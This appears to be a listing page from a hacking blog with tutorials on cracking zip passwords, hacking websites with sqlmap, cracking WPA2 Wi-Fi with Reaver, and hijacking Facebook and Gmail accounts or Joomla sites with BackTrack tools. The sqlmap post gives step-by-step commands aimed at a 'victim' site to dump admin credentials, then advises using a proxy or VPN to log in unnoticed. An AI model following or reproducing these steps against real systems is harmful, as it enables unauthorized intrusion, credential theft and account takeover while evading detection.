Now you all can invite me on skype for any kind of help required as my username is krackoworld


Showing posts with label BackTrack 5. Show all posts
Showing posts with label BackTrack 5. Show all posts

01 March 2014

Video: How to Crack Password Protected Zip Files Using Fcrackzip


fcrackzip Well After an long time, Today We are back with an exciting post on How to Crack Password Protected Zip Files using Fcrackzip with an Video Tutorial. Thus Fcrackzip is an zip password cracker, similar to fzc, zipcrack and others. This software is totally free to use and apply in seconds. I have seen many zipcrackers I found were able to find the passwords, either they didn't accept more than one zipfile, were awfully slow, or didn't do brute force attacks (which I needed), So Fcrackzip is all about doing things at perfect. Therefore lets learn more about it and watch the video carefully!

Top Features of Fcrackzip

  • FREE

    It doesn't cost anything, it will run on many architectures, and the source is freely available, so you can customise it to your needs. If you make improvements, don't hesitate to mail them to me, and I will include them in fcrackzip!

    One goal of fcrackzip was to provide a free but still fast zipcracker, so that other people can improve and contribute it further, in an open developement style.

    Other programs, like fzc, come not only without source, but the executable is even encrypted, so improving it or customizing it is difficult at best. (Maybe the programmers of other crackers don't want that people see how crappy their code actually is? Nobody knows for sure, but I see no other reason for this strange, but common, behaviour)

  • FAST

    On my old machine (a pentium-90), the portable C version is 12% slower than fzc, the fastest cracker I could find. Small parts of fcrackzip have been converted to x86 assembly, so it performs a bit faster (around 4%) than fzc now, on the same hardware (note: this is highly os/compiler dependent). Since the author of fzc claims that it is written fully in assembler, further improvements might well be possible. Incidently, on my new P-II machine, fcrackzip is almost twice as fast as fzc ;)

  • PORTABLE

    fcrackzip was written in ISO-C, and should run on most platforms, even 64 bit ones (maybe after some tweaking). I'll be glad to hear about portability problems so I can fix them.

  • FEATUREFUL

    fcrackzip will, at some later stage at least, support many more useful operation modes than other crackers. It already supports multiple zip files with multiple files. Remember that the code is only a few hours old!

    However, since version 0.2.0 fcrackzip also includes a mode to brute force cpmask'ed images, something no other program (that I know of) can do, so at least there is one feature other crackers don't have.

    And you can always implement your own modes.

Video Tutorial on How to Crack Zip Files Password?

That’s it! Enjoy, Credits- 101hacker

If anyone having any doubts and queries regarding the post, then Please comment below.



18 October 2012

How to Hack Websites via SQL Map?


sqlmap Hi friends How are you? I hope all are fine and Today by managing some time, I am going to tell you the procedure of Website Hacking using SQL Map. So first lets start with its definition. sqlmap is an open source penetration testing tool that automates the process of detecting and exploiting SQL injection flaws and taking over of database servers properly. Now to start with this tutorial all you need is 3 things as mentioned below.

1. Backtrack 5

2. Vulnerable Website

3. Little bit Mind

Procedure for Hacking Websites using SQL Map 2012

1. First of all Open your backtrack terminal and type cd /pentest/database/sqlmap and hit enter. Now sqlmap is open in your terminalsql map 1
2. Now find the vulnerable site. ( In this case, I already have vulnerable site)
sql map 2
3. Now type this command in the terminal and hit enter. (refer above figure)

python sqlmap.py -u http://yourvictim'slink/index.php?id=4 –dbs


4. Now you will get the database name of the website

sql map 3

Well I got the two database aj and information_schema we will select aj database.
5. Now get the tables of that database. For that you need to enter this command into your terminal and simply press Enter.

python sqlmap.py -u http://yourvictim'slink/index.php?id=4 -D  (database name) –tables

6. Now we need to grab the tables from the aj database. paste this command below and hit enter.

python sqlmap.py -u http://www.yourvictim'slink.com/index.php?id=4 -D aj –tables

sql map 4

7. Now you will get the tables list which is stored in aj database.
sql map 5

8. Just grab the columns from the admin table and

python sqlmap.py -u http://www.yourvictim'slink.com/index.php?id=4 -T admin --columns

sql map 7

Now we got the columns and we got username and password too
9. Here we will grab the passwords of the admin

python sqlmap.py -u http://www.yourvictim'slink.com/index.php?id=4 -T admin -U test --dump

Now we got the username and the password of the website !
sql map 9

Now just find the admin penal of the website and use proxy/vpn when you are trying to login in the website as a admin.

10. That's it! Enjoy hacking.

Any Comments are Welcomed Below…



24 September 2012

Learn How to Crack Local WPA2 Wifi Network Passwords?


how to hack wifi passwordsLast month I get lots of emails from my Indian friends that How to crack WPA/WPA2 Wifi passwords in simplest way using Ubuntu, now for that today i am here. Wifi is your wireless gateway to the internet and makes surfing even fun. Therefore today we will learn How to crack WPA2 network key using Reaver. In simple words, Reaver is a new, free, open-source tool which can exploits a security hole in wireless routers and can crack most routers' current passwords with relative ease. So lets the Crack in method below. Enjoy!



23 May 2012

Hacking Facebook, Gmail Account Using Backtrack and SET



Hello, friends i am back with a latest post on hacking facebook,gmail accounts using backtrack and social engineering kit.Things you needed are following:
1. Backtrack 5 R2
2. Internet connection 


Now follow all my steps like I am showing in this post:

1. First open the social engineering kit using this command in cd /pentest/exploits/set and then press enter and then type ./set and hit enter like in image. 



Hacking Joomla Blog With BackTrack 5 R2




Here i am with a new working hack to scan and exploit a Joomla blog. Things you needed are following:
1.Backtrack 5
2.Internet connection
Here are following steps, please follow all the steps according to this post:

 1. Click on Applications/Backtrack/Vulnerability assesment/Web Vulnerability assessment/CMS Vulnerability Identification/joomscan.



 

Recent Posts

Review this blog on Bloggers.com

Recent Comments

| KrackoWorld (KoW) © 2014. All Rights Reserved | Style By All Web Designing | | Contact |